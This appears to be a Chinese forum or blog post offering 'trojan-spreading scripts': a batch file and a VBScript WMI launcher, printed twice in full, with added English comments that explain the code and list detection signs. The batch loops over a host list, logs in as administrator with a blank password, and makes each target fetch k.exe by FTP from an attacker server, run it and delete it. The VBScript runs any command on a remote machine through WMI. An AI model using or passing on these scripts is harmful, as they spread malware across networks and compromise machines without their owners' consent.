很简单的自己看代码
Bat代码的传马脚本
@ECHO OFF&SETLOCAL ENABLEDELAYEDEXPANSION
REM Spreader loop: every line of host.txt is treated as a target address and handed to the
REM VBScript WMI launcher (rpmd.vbe, the "VBE" script further down this page) together with
REM the hard-coded account "administrator" and an empty password.
REM The label ":start" and the variable "A" are set here but never referenced again.
:start
SET A=1
REM FINDSTR /N prefixes each line of host.txt with its line number ("n:text"); TOKENS=1* with
REM DELIMS=: puts the number in %%A and the rest of the line (the host) in %%B, so one
REM cscript process is started per host.
REM The command line sent to each host writes an FTP script (net.dat: open, user 123,
REM password 123, get k.exe, bye), runs ftp -s:net.dat to fetch k.exe from the server named
REM in place of the placeholder "IP地址", executes k.exe twice and then deletes net.dat and k.exe.
REM Defender notes: cscript.exe starting cmd.exe that in turn runs ftp.exe with "-s:", a freshly
REM written FTP script file, an executable run and immediately deleted from the same directory,
REM and a burst of outbound DCOM/RPC (TCP 135 plus dynamic ports) connections from one host
REM are the observable artefacts of this loop.
FOR /F "TOKENS=1* DELIMS=:" %%A IN ('FINDSTR /N .* host.txt') DO (
call start cscript rpmd.vbe %%B administrator "" "cmd /c @echo open IP地址>>net.dat&@echo 123>>net.dat&@echo 123>>net.dat&@echo get k.exe>>net.dat&@echo bye>>net.dat&@ftp -s:net.dat&del net.dat&k.exe&k.exe&del k.exe)
VBE代码的传马脚本
' Remote WMI command launcher (the rpmd.vbe that the batch spreader on this page invokes).
' Every runtime error in the script is suppressed from here on, so an unreachable host,
' rejected credentials or a failed Win32_Process.Create produce no error text; the
' status lines echoed below are therefore not a reliable indicator of success.
on error resume Next
' Host check: when started under the GUI host wscript.exe (e.g. by double-click), relaunch
' under cscript.exe inside a persistent "cmd.exe /k" console so the echoed output stays visible.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end If
' Prints the banner (including the author's site URL) and the positional-argument help:
' <target IP> <user name> <password> <DOS command to run>.
' Called both when arguments are missing and before every connection attempt.
function usage()
wscript.echo ""
wscript.echo " 远程调用Cmd执行DOS命令"
wscript.echo " Http://www.736202.com"
wscript.echo ""
wscript.echo ""
wscript.echo "_____________________________________________________________________________"
wscript.echo "用法:"
wscript.echo "cscript "&wscript.scriptname&" <目标IP> <用户名> <密码> <要执行的DOS命令>"
wscript.echo "_____________________________________________________________________________"
end Function
' Requires at least three arguments (a fourth, the command line, is read below).
if wscript.arguments.count<3 then
usage()
wscript.echo "错误缺少参数!"
wscript.quit
end if
' Positional arguments: 0 = target address, 1 = user name, 2 = password,
' 3 = the command line passed unchanged to Win32_Process.Create on the target.
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
commands=wscript.arguments(3)
' A literal two-character "" argument (what the batch spreader passes) is replaced by Null.
if password=chr(34)&chr(34) then password=Null
usage()
wscript.echo ""&ipaddress&"正在和对方电脑和谐中,请稍等...."
' Remote WMI connection (DCOM) to the target's root/cimv2 namespace with the supplied
' credentials. Detection: inbound DCOM/RPC from an unexpected source host, network-logon
' events for the account on the target, and the target's WMI-Activity operational log.
set objlocator=createobject("wbemscripting.swbemlocator") '20
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
' "errornumber" is never assigned anywhere in this script and both branches print the same
' text, so this block does not actually report whether the connection succeeded.
if errornumber<>0 then
wscript.echo "和谐完毕!"
wscript.quit
else
wscript.echo "和谐完毕!"
end if
' Enables additional token privileges on the WMI connection (WbemPrivilegeEnum values:
' 23 = RemoteShutdown, 18 = Shutdown, 7 = Security).
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
' Hands off to command() below; it does not return (every path ends in wscript.quit).
call command()
' Creates a process on the already-connected target by invoking the static WMI method
' Win32_Process.Create with the global "commands" as its CommandLine, echoes the new PID
' and exits. Reads the globals objswbemservices, commands and ipaddress set above.
' Detection: on the target the created process has WmiPrvSE.exe as its parent, a common
' hunting signal for WMI-based remote execution and lateral movement.
function command()
wscript.echo "正在和对方电脑和谐中进行中...."
set objinstance=objswbemservices.get("win32_process") ' the class object, not an instance
set objmethod=objinstance.methods_("create")
set objinparam=objmethod.inparameters.spawninstance_() ' empty in-parameter object for Create
objinparam.commandline=commands
set objoutparam=objinstance.execmethod_("create",objinparam)
' Create returns 0 on success; both branches print the same message, so the output does
' not distinguish success from failure (and the non-zero branch quits without the PID line).
if objoutparam.returnvalue<>0 then
wscript.echo "又和谐到一台!"
wscript.quit
else
wscript.echo "又和谐到一台!"
end if
wscript.echo "进程使用 PID 识标为 : "&objoutparam.processid
wscript.echo "在 "&ipaddress&" 上执行命令成功了!"&vbcrlf
wscript.quit
end Function
Bat代码的传马脚本
@ECHO OFF&SETLOCAL ENABLEDELAYEDEXPANSION
REM Spreader loop: every line of host.txt is treated as a target address and handed to the
REM VBScript WMI launcher (rpmd.vbe, the "VBE" script further down this page) together with
REM the hard-coded account "administrator" and an empty password.
REM The label ":start" and the variable "A" are set here but never referenced again.
:start
SET A=1
REM FINDSTR /N prefixes each line of host.txt with its line number ("n:text"); TOKENS=1* with
REM DELIMS=: puts the number in %%A and the rest of the line (the host) in %%B, so one
REM cscript process is started per host.
REM The command line sent to each host writes an FTP script (net.dat: open, user 123,
REM password 123, get k.exe, bye), runs ftp -s:net.dat to fetch k.exe from the server named
REM in place of the placeholder "IP地址", executes k.exe twice and then deletes net.dat and k.exe.
REM Defender notes: cscript.exe starting cmd.exe that in turn runs ftp.exe with "-s:", a freshly
REM written FTP script file, an executable run and immediately deleted from the same directory,
REM and a burst of outbound DCOM/RPC (TCP 135 plus dynamic ports) connections from one host
REM are the observable artefacts of this loop.
FOR /F "TOKENS=1* DELIMS=:" %%A IN ('FINDSTR /N .* host.txt') DO (
call start cscript rpmd.vbe %%B administrator "" "cmd /c @echo open IP地址>>net.dat&@echo 123>>net.dat&@echo 123>>net.dat&@echo get k.exe>>net.dat&@echo bye>>net.dat&@ftp -s:net.dat&del net.dat&k.exe&k.exe&del k.exe)
VBE代码的传马脚本
' Remote WMI command launcher (the rpmd.vbe that the batch spreader on this page invokes).
' Every runtime error in the script is suppressed from here on, so an unreachable host,
' rejected credentials or a failed Win32_Process.Create produce no error text; the
' status lines echoed below are therefore not a reliable indicator of success.
on error resume Next
' Host check: when started under the GUI host wscript.exe (e.g. by double-click), relaunch
' under cscript.exe inside a persistent "cmd.exe /k" console so the echoed output stays visible.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end If
' Prints the banner (including the author's site URL) and the positional-argument help:
' <target IP> <user name> <password> <DOS command to run>.
' Called both when arguments are missing and before every connection attempt.
function usage()
wscript.echo ""
wscript.echo " 远程调用Cmd执行DOS命令"
wscript.echo " Http://www.736202.com"
wscript.echo ""
wscript.echo ""
wscript.echo "_____________________________________________________________________________"
wscript.echo "用法:"
wscript.echo "cscript "&wscript.scriptname&" <目标IP> <用户名> <密码> <要执行的DOS命令>"
wscript.echo "_____________________________________________________________________________"
end Function
' Requires at least three arguments (a fourth, the command line, is read below).
if wscript.arguments.count<3 then
usage()
wscript.echo "错误缺少参数!"
wscript.quit
end if
' Positional arguments: 0 = target address, 1 = user name, 2 = password,
' 3 = the command line passed unchanged to Win32_Process.Create on the target.
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
commands=wscript.arguments(3)
' A literal two-character "" argument (what the batch spreader passes) is replaced by Null.
if password=chr(34)&chr(34) then password=Null
usage()
wscript.echo ""&ipaddress&"正在和对方电脑和谐中,请稍等...."
' Remote WMI connection (DCOM) to the target's root/cimv2 namespace with the supplied
' credentials. Detection: inbound DCOM/RPC from an unexpected source host, network-logon
' events for the account on the target, and the target's WMI-Activity operational log.
set objlocator=createobject("wbemscripting.swbemlocator") '20
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
' "errornumber" is never assigned anywhere in this script and both branches print the same
' text, so this block does not actually report whether the connection succeeded.
if errornumber<>0 then
wscript.echo "和谐完毕!"
wscript.quit
else
wscript.echo "和谐完毕!"
end if
' Enables additional token privileges on the WMI connection (WbemPrivilegeEnum values:
' 23 = RemoteShutdown, 18 = Shutdown, 7 = Security).
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
' Hands off to command() below; it does not return (every path ends in wscript.quit).
call command()
' Creates a process on the already-connected target by invoking the static WMI method
' Win32_Process.Create with the global "commands" as its CommandLine, echoes the new PID
' and exits. Reads the globals objswbemservices, commands and ipaddress set above.
' Detection: on the target the created process has WmiPrvSE.exe as its parent, a common
' hunting signal for WMI-based remote execution and lateral movement.
function command()
wscript.echo "正在和对方电脑和谐中进行中...."
set objinstance=objswbemservices.get("win32_process") ' the class object, not an instance
set objmethod=objinstance.methods_("create")
set objinparam=objmethod.inparameters.spawninstance_() ' empty in-parameter object for Create
objinparam.commandline=commands
set objoutparam=objinstance.execmethod_("create",objinparam)
' Create returns 0 on success; both branches print the same message, so the output does
' not distinguish success from failure (and the non-zero branch quits without the PID line).
if objoutparam.returnvalue<>0 then
wscript.echo "又和谐到一台!"
wscript.quit
else
wscript.echo "又和谐到一台!"
end if
wscript.echo "进程使用 PID 识标为 : "&objoutparam.processid
wscript.echo "在 "&ipaddress&" 上执行命令成功了!"&vbcrlf
wscript.quit
end Function